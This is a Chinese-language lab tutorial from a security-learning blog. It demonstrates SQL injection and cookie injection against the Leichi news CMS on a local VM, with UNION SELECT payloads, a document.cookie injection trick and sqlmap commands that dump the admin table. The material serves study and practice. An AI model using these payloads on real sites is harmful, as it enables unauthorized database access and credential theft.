目录

ACCESS注入

雷驰新闻系统v1.0环境搭建:

ACCESS数据库注入演示1:

雷驰新闻系统v3.0环境搭建:

cookie注入演示2:

ACCESS数据库注入用sqlmap怎么做?演示:

ACCESS注入

雷驰新闻系统v1.0源码下载(leichinewsv1.0.zip):https://www.onlinedown.net/soft/136.htm   
雷驰新闻系统v3.0源码下载(leichinewsv3.0.rar):http://down.chinaz.com/soft/16763.htm
环境:win2003

雷驰新闻系统v1.0环境搭建:

打开win2003虚拟机
ip为:192.168.3.114
①把雷驰新闻系统源代码拷贝到IIS的根目录下(c:\Inetpub\wwwroot)

②打开IIS(开始---管理工具---IIS)
新建网站---描述8001-leichinewsv1.0---网站TCP端口:8002  网站IP地址全部未分配(要给了地址就只能从这个地址访问了)---路径(找到文件)---访问权限全部勾选
注意:允许asp

③搭建完成

打开物理机访问192.168.3.114:8001

用户名区分大小写!

ACCESS数据库注入演示1:

1、http://192.168.3.114:8002/onews.asp?id=45  考虑存在SQL注入漏洞
①添加单引号----显示数据库出错(但是没有报错)
②order by判断出有11列
③?id=45 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11  显示数据库出错

报错原因在于:access数据库联合查询的时候后面必须要跟上一个from+表名
在我们mysql数据库中union select 后面不需要跟上from+表名,access数据库中需要给一个表名

④?id=45 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11 from admin(站在防御者的角度来看,表名是可以被猜到的)

⑤发现2和3位置有回显(获得用户名密码)

⑥登录后台(adminlogin.asp)

发现登不进去:

可能bfpms是一个密文

使用雷驰加密解密工具,解密后bfpms就是admin

还是进不去,说明我们服务器没有正确配置,服务器少改了一个选项就是启用父路径

后台管理:如果admin/ad_login.asp这个网页不是在站点的根目录下,而是在子目录下,所以要启用父路径:
如何打开父路径?比如要打开zr网站:zr右键属性——》主目录——》配置——》选项——》启用父路径(勾上后就意味着这个站点下的子文件夹就可以访问了)

刷新一下页面,就登录进来了:

雷驰新闻系统v3.0环境搭建:

1、将下载的文件放到IIS的根目录下

2、新建网站---描述8002-leichinewsv3.0---网站TCP端口:8003  网站IP地址全部未分配(要给了地址就只能从这个地址访问了)---路径(找到文件)---访问权限全部勾选
注意:允许asp
leichinewsv3.0右键属性---主目录--配置---选项--启用父路径

cookie注入演示2:

http://192.168.3.114:8003/onews.asp?id=46

①添加单双引号(都显示数据库出错)怀疑是数字型注入
②order by 1

怎么绕过他呢?
返回onnews.asp显示数据库出错
这时候打开console控制台:输入document.cookie="id=46"回车刷新页面后就可以访问了
这说明我们把id放到cookie里面去,页面就能正常
我们再来一发:访问id=45的页面(到存储里面改就行)

刷新一下就行了
服务器端可以接受来自cookie的参数,那我们可以在那里面order by了(空格用加号代替):不要加号代替空格做不出来
成功
不正常

测试后得知有11个字段

处理方法:document.cookie="id="+escape("-45 union select 1,2,3,4,5,6,7,8,9,10,11 from admin")  注意写法

escape在js当中会对字符串进行url编码
如果把id=写在escape里,就会把等号变成url编码形式,cookie就不会识别到id=这个cookie的名字

成功

ACCESS数据库注入用sqlmap怎么做?演示:

http://192.168.3.114:8002/

远程连接kali:ssh root@192.168.3.113

sqlmap -u "http://172.16.132.135:8001/onews.asp?id=45"


由于我们access数据库注入不用猜测它的数据库名的,直接--tables直接猜测表名

----

对于雷驰v1.0:
sqlmap -u "http://172.16.132.135:8001/onews.asp?id=45" --tables


sqlmap -u "http://172.16.132.135:8001/onews.asp?id=45" -T "admin" --columns


sqlmap -u "http://172.16.132.135:8001/onews.asp?id=45" -T "admin" -C "admin,passoword" --dump

----

SQLmap有缓存:history

对于雷驰3.0:
sqlmap -u "http://172.16.132.135:8002/onews.asp?id=45"           (X)

发现没有注入

我们需要一个特殊技巧,我们把id参数通过cookie提交,然后--level2:
sqlmap -u "http://172.16.132.135:8002/onews.asp" --cookie "id=45" --level 2   (√ )

sqlmap -u "http://172.16.132.135:8002/onews.asp" --cookie "id=45" --level 2  --tables
后面操作都一样

【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入相关推荐

  1. SQL注入学习part07:(SQL注入语句总结)

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) SQL注入学习part07 整数型和字符型 整数型 字符型 ...

  2. cookie注入原理详解

    那我们还是围绕以下几个问题来看看cookie注入: 1.什么是cookie注入? 2.为什么要cookie注入? 3.怎样cookie注入? 1.什么是cookie注入? ♦cookie注入的原理是: ...

  3. cookie注入分析和动画教程

    cookies的注入方法和原理 现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式 ...

  4. sqlmap指定cookie_利用SQLMap进行cookie注入

    SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工 ...

  5. 34. 注入篇——Cookie注入

    Cookie注入原理 (1)数据读取流程:对于WEB服务器而言,读取数据的流程是先取GET中的数据,如果GET中没有数据信息,那么再取POST中的数据,如果POST中也没有那么就会去取COOKIE中的 ...

  6. Access数据库——Cookie注入

    目录 1.Cookie注入 什么是Cookie? Cookie注入简介 Cookie和注入有什么关系? Cookie的核心 2.如何设置Cookie? 方法一:依靠浏览器进行设置 方法二:抓包直接修改 ...

  7. Access教程 第一章 Access数据库基础

    本章内容 ◆ 数据库基础知识及关系数据库管理系统. ◆ Access 2003 中文版介绍. 数据库技术产生于60年代末.70年代初,它的出现使计算机应用进入了一个新的时期--社会的每一个领域都与计算 ...

  8. access数据类型百度百科_Access数据库属于什么数据库。

    展开全部 Access数据库属于关系模型数据库. Microsoft Office Access是微软把数据库引擎的图形用户界面32313133353236313431303231363533e789 ...

  9. access数据库文件导入mysql数据库文件怎么打开,Access数据库从外部数据导入文本文件和VF数据库-dbf文件怎么打开...

    亲爱的小伙伴们,我们又见面了! 上一期我们学习了Access数据库从外部数据导入Excel文件,下图学生成绩表2就是我们新导入的数据: 导入Excel文件 今天我们来学习如何从外部数据导入文本文件和V ...

最新文章

  1. 几款LED灯带作为反向电流感应测试
  2. 《企业大数据系统构建实战:技术、架构、实施与应用》一3.2 如何选择解决方案...
  3. 使用node.js作为简单的Web服务器
  4. 基于matlab的信号去噪,基于matlab的信号去噪研究.doc
  5. 2013\Province_C_C++_A\3.振兴中华
  6. 服务器备份文件格式,证书服务器,备份,还原
  7. 反序列化 jackson_使用Jackson和Super类型令牌的Json反序列化
  8. java重定向cookie_response请求转发和重定向,cookie
  9. 学习Spring Boot:(二十四)多数据源配置与使用
  10. centos安装mysql8.0.13_CentOS 7.4安装MySql 8.0.13及配置
  11. Kafka 环境部署与配置详解
  12. LaTex字体、符号汇总
  13. Web前端 — Bootstrap(2)
  14. 数据库的跨平台设计(转)
  15. python3下载m3u8转mp4_Python3.6:根据m3u8下载mp4视频
  16. 深入分析 Uniswap V3 流动性供应的数学原理
  17. c++ 调用opencv+tesseract做图片文字识别
  18. python画地图经纬度_【python】使用python按照一定格式批量输出,地图热力图经纬度格式生成器...
  19. 采集天猫网的10个经典方法
  20. Kinect v2.0原理介绍之八:高清面部帧(1) FACS 介绍

热门文章

  1. dbEntry.net CK.K的高级应用
  2. hdu 5606(并查集)
  3. JSP简单练习-EL获取表单数据
  4. NYOJ 636 世界末日
  5. NYOJ 118 修路方案(次小生成树)
  6. 七.Hystrix Timeout机制
  7. 虚拟机——虚拟机的初步认识
  8. python中的多进程与多线程(二)
  9. 剑指offer-99.调整数组顺序使奇数位于偶数前面
  10. JQuery的无缝滚动